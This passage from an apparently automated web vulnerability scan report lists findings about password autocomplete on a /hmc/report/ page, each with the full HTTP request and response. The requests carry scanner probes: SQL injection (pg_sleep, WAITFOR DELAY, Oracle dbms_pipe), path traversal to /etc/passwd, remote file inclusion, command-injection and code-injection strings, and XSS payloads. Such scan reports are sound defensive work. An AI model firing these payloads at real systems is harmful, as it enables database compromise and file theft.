Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.86. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.87. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.88. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=php://filter//resource=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.89. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.90. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.91. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.92. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.93. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.94. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=http://netsparker.com/n? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.95. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.96. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=print(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=print(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.97. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%3Cscript%3Ens(0x000031)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%3cscript%3ens(0x000031)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.98. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=body%7Bx:expression(netsparker(0x00004C))%7D HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x00004C))%7D" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.99. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=//netsparker.com/n/n.css?0x00001D HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x00001d" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.100. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.101. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.102. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1+AND+'NS%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1+AND+'NS%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.103. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

